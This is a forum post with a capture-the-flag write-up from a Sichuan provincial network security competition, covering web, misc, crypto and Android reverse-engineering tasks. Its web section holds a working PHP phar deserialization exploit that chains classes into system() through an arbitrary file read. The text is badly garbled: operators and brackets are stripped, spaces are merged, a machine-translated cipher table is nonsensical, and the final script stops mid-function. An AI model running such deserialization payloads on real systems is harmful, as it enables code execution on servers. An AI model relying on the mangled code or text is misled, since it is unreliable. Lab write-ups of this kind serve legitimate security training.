Jump to content

Title: Sichuan Provincial Employee Vocational Skills Competition Network Security Final WP

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

Morning CTF part

web

simplelogin

yakit burst out the password, remember it should be a123456:

cwfx23ohon417551.png

pppp

index.php has an arbitrary file read:

?php

//upload.php

error_reporting(0);

highlight_file(__FILE__);

class A {

public $a;

public function __destruct()

{

$s=$this-$a;

$s();

}

}

class B{

public $cmd;

function __invoke(){

return $this-start();

}

function start(){

echo system($this-cmd);

}

}

if(isset($_GET['file'])) {

if(strstr($_GET['file'], 'flag')) {

die('Get out!');

}

echo file_get_contents($_GET['file']);

}

?

Read upload.php:

!--?php

error_reporting(0);

if(isset($_FILES['file'])){

mkdir('upload');

$uid=uniqid();

$ext=explode('.',$_FILES['file']['name']);

$ext=end($ext);

move_uploaded_file($_FILES['file']['tmp_name'],'upload/'.$uuid.'.png');

echo'UploadSuccess!FilePath:upload/'.$uuid.'.png';

}--

The uploaded file will be changed to .png

Try uploading the phar file and triggering the deserialization execution command with file_get_contents on the homepage:

//phar.php

?php//phar.php

classA{

public$a;

publicfunction__destruct()

{

$s=$this-a;

$s();

}

}

classB{

public$cmd;

function__construct(){

$this-$cmd='catflag';

}

function__invoke(){

return$this-start();

}

functionstart(){

system($this-cmd);

}

}

$b=newB();

$b-cmd='cat/flag';

$a=newA();

$a-a=$b;

@unlink('phar.phar');

$phar=newPhar('phar.phar');//The suffix must be phar

$phar-startBuffering();

$phar-setStub('?php__HALT_COMPILER();');//Set stub

$phar-setMetadata($a);//Save custom meta-data into manifest

$phar-addFromString('a.txt','abb');//Add the file to be compressed

$phar-stopBuffering();//Signature automatically calculates

?

Upload and access:

htmdk4fshkz17555.png

misc

ftp

Traffic extraction zip, and then password is the same password password1234567890

0eys1alfu5o17558.png

crypto

baby_Words on Zen with Buddha

aes, but after XOR, the result is converted into characters, so you can turn it back and solve aes

ruShiWoWen=[

'无', 'mu', 'monk', 'room', 'art', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser', 'ser'

'未', 'li', 'blin', 'due', 'mul', 'pregnancy', 'san', 'black', 'naked', 'bean', 'special', 'div', 'reach', 'return', 'length', 'length', 'length', 'length', 'length', 'length',

'li', 'written', 'number', 'responsible', 'respect', 'ro', 'respect', 'respect', 'know', 'three', 'bing', 'no', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible', 'responsible',

'Insight', 'thought', 'dream', 'until', 'remove', 'horrible', 'restrained', 'restrained', 'restrained', 'restrained', 'will', 'wisdom', 'old', 'toward',

'roar', 'foot', 'you', 'wang', 'you', 'won', 'mu', 'mu', 'light', 'protect', 'jin', 'harmony', 'going', 'treasure', 'win', 'tong', 'won', 'win', 'tong',

'medicine', 'teacher', 'little', 'living', 'pure', 'deal', 'mountain', 'good', 'pass', 'go', 'seven', 'not', 'come', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart', 'smart',

'Cause', 'Thousand', 'Five', 'Hundred', 'Ten Thousand', 'Flowers', 'Billions', 'Decision', 'Six', 'Fang', 'Name', 'Name', 'Tong', 'Yue', 'Yun', 'Dian', 'Miracle',

'Zun', 'tree', 'root', 'west', 'soap', 'flame', 'north', 'qing', 'number', 'element', 'improve', 'head', 'lower', 'silence', 'quantity', 'element', 'element', 'four', 'element', 'four', 'element', 'four', 'element', 'four', '

'Do', 'Shi', 'Ga', 'Mu', 'Ni', 'Le', 'A', 'Du', 'Zhong', 'Yang', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong', 'Zhong'

'action', 'in', 'empt', 'empt', 'compassion', 'worry', 'someone', 'satisfaction', 'stable', 'rest', 'day', 'night', 'cultivation',

'hold', 'heart', 'seeking', 'recitation', 'recitation', 'this', 'sutra', 'energy', 'death', 'elimination', 'elimination', 'toxic', 'harm', 'high', 'open', 'text',

'super', 'lift', 'cool', 'as if', 'thought', 'that', 'that', 'emperor', 'vi', 'true', 'ling', 'qian', 'shu', 'ha', 'respect',

'Gift', 'Feng', 'Ancestor', 'First', 'Filial Piety', 'Double', 'My Master', 'Stay', 'My Master', 'Love', 'Brother', 'Brother', 'First', 'Friend', 'Friend', 'Friend', 'Friend',

'Music', 'Zen', 'Clan', 'Home', 'My', 'My', 'Teaching', 'Sun', 'Time', 'Tire', 'Bulse', 'Yin', 'Yin', 'Difficult', 'Economic',

'urgent', 'soft', 'soft', 'shoulder', 'creation', 'soft', 'soft', 'shu', 'shu', 'shu', 'shu', 'creation', 'repet', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', 'don', '

'kill', 'release', 'bridge', 'road', 'cove', 'little', 'draw', 'draw', 'draw', 'sleep', 'sweep', 'sweep', 'sweep', 'sweep', 'sweep', 'don', 'invest', 'invest']

enc='The person who recites the love is guarding the Mengzabao and lying the lying of the lying of the heart, and killing the lying of the heart, and worrying, and reciting the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the lying of the

dec=b''

for i in enc:

dec +=(ruShiWoWen.index(i) ^ 64).to_bytes(1, 'little')

KEY=b'DASCTF@Key@^_^@Encode!Buddha!'

IV=b'IV|DASCTF|OvO|IV'

from Crypto.Cipher import AES

from Crypto.Util.Padding import pad, unpad

cryptor=AES.new(KEY, AES.MODE_CBC, IV)

# padded_data=pad(data.encode('utf-8'), AES.block_size)

encrypted_data=cryptor.decrypt(dec)

print(encrypted_data)

2bsldbye20n17561.png

re

NormalAndroid

When you open jadx, you only call one function in so, ida and look at it in the past:

u0nrsz2t2lx17562.png

You can see something like a key and transform the key:

mre1puao3uy17563.png

surface:

grgyesvf5bo17564.png

surface

a203ugiarw417565.png

Then enter the encryption logic, which is an AES encryption, and the S box was modified in the past:

k5exqyfylk517566.png

So I just find a code implemented by AES to modify the S box, and then use the transformed key to decrypt it. Because the network competition was cut off, there was no script stored at that time, so I didn't make it:

fromCrypto.Util.numberimportlong_to_bytes,bytes_to_long

#https://github.com/bozhu/AES-Python/blob/master/aes.py

Sbox=(

0xBE,0xB4,0x9F,0x70,0xDB,0xAD,0x31,0x30,0x6C,0x87,

0x74,0x27,0xC9,0x4C,0x67,0x62,0x0A,0x36,0x08,0xC8,

0x96,0x32,0x00,0xF1,0x38,0x65,0xEC,0xED,0x44,0x25,

0xAA,0x33,0x86,0xEF,0x0D,0x19,0x7D,0xD5,0x45,0xFB,

0x8D,0x61,0xFE,0x50,0x47,0x7E,0x7C,0xF9,0x01,0xDE,

0xFF,0xE1,0xAC,0x5D,0xB5,0x8E,0x48,0xBF,0x90,0x9D,

0x79,0xCB,0xA6,0xA9,0xFC,0x34,0xCF,0x63,0x5A,0x99,

0x98,0xB8,0x92,0x2D,0x02,0x89,0x2C,0x3B,0x15,0x72,

0x5E,0x60,0x29,0x6F,0x0B,0x24,0x6D,0x1C,0x5B,0xE0,

0x37,0xA4,0xCC,0x12,0x93,0xA7,0x09,0xC6,0xB6,0x8F,

0x04,0x20,0xE8,0x46,0xB1,0xAE,0x3A,0x68,0x81,0xCE,

0x2B,0x0C,0xB3,0x3E,0xC0,0x0E,0x4D,0xD8,0xD2,0xA2,

0x9E,0x56,0x28,0xB0,0x35,0x1B,0x5F,0xF5,0x05,0xBC,

0x3C,0x4F,0x8C,0xE6,0xF6,0x75,0xF4,0xF8,0xDD,0x11,

0xC1,0xB9,0x4E,0x97,0xD6,0xF2,0xE4,0xD1,0x82,0xD3,

0x03,0x8B,0x4B,0xCA,0x64,0xEB,0xAB,0x71,0xA1,0xBA,

0xA8,0x6A,0x1E,0x1A,0xA5,0x49,0x6E,0x53,0x66,0x39,

0x51,0xE9,0x26,0xC4,0xDA,0x55,0x3F,0xEA,0x85,0x8A,

0xD9,0x13,0x69,0x1F,0xE2,0x7F,0x2F,0xC5,0x88,0x57,

0x73,0xA3,0xE3,0x0F,0xBB,0x18,0xE5,0x42,0x22,0x52,

0x43,0x80,0x2A,0x6B,0x17,0xD7,0x23,0x06,0x58,0x1D,

0x7A,0x84,0xE7,0xEE,0xD0,0x41,0xD4,0xBD,0xA0,0xC3,

0xC2,0xFD,0x21,0x54,0xDF,0x7B,0xB7,0xF0,0xB2,0x77,

0x3D,0x07,0x78,0x16,0x9C,0x59,0xAF,0x2E,0x83,0xFA,

0x9B,0x95,0xF7,0x40,0x94,0xF3,0xCD,0xC7,0x91,0x10,

0xDC,0x4A,0x14,0x9A,0x5C,0x76

)

InvSbox=[Sbox.index(i)foriinrange(256)]

#learntfromhttp://cs.ucsb.edu/~koc/cs178/projects/JT/aes.c

xtime=lambdaa:(((a1)^0x1B)0xFF)if(a0x80)else(a1)

Rcon=(

0x00,0x01,0x02,0x04,0x08,0x10,0x20,0x40,

0x80,0x1B,0x36,0x6C,0xD8,0xAB,0x4D,0x9A,

0x2F,0x5E,0xBC,0x63,0xC6,0x97,0x35,0x6A,

0xD4,0xB3,0x7D,0xFA,0xEF,0xC5,0x91,0x39,

)

deftext2matrix(text):

matrix=[]

foriinrange(16):

byte=(text(8*(15-i)))0xFF

ifi%4==0:

matrix.append([byte])

else:

matrix[i//4].append(byte)

returnmatrix

defmatrix2text(matrix):

text=0

foriinrange(4):

forjinrange(4):

text|=(matrix[i][j](120-8*(4*i+j)))

returntext

classAES:

def__init__(self,master_key):

self.change_key(master_key)

defchange_key(self,master_key):

self.round_keys=text2matrix(master_key)

#printself.round_keys

foriinrange(4,4*11):

self.round_keys.append([])

ifi%4==0:

byte=self.round_keys[i-4][0]\

^Sbox[self.round_keys[i-1][1]]\

^Rcon[i//4]

self.round_keys[i].append(byte)

forjinrange(1,4):

byte=self.round_keys[i-4][j]\

^Sbox[self.round_keys[i-1][(j+1)%4]]

self.round_keys[i].append(byte)

else:

forjinrange(4):

byte=self.round_keys[i-4][j]\

^self.round_keys[i-1][j]

self.round_keys[i].append(byte)

#printself.round_keys

defencrypt(self,plaintext):

self.plain_state=text2matrix(plaintext)

self.__add_round_key(self.plain_state,self.round_keys[:4])

foriinrange(1,10):

self.__round_encrypt(self.plain_state,self.round_keys[4*i:4*(i+1)])

self.__sub_bytes(self.plain_state)

self.__shift_rows(self.plain_state)

self.__add_round_key(self.plain_state,self.round_keys[40:])

returnmatrix2text(self.plain_state)

defdecrypt(self,ciphertext):

self.cipher_state=text2matrix(ciphertext)

self.__add_round_key(self.cipher_state,self.round_keys[40:])

self.__inv_shift_rows(self.cipher_state)

self.__inv_sub_bytes(self.cipher_state)

foriinrange(9,0,-1):

self.__round_decrypt(self.cipher_state,self.round_keys[4*i:4*(i+1)])

self.__add_round_key(self.cipher_state,self.round_keys[:4])

returnmatrix2text(self.cipher_state)

def__add_round_key(self,s,k):

foriinrange(4):

forjinrange(4):

s[i][j]^=k[i][j]

def__round_encrypt(self,state_matrix,key_matrix):

self.__sub_bytes(state_matrix)

self.__shift_rows(state_matrix)

self.__mix_columns(state_matrix)

self.__add_round_key(state_matrix,key_matrix)

def__round_decrypt(

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.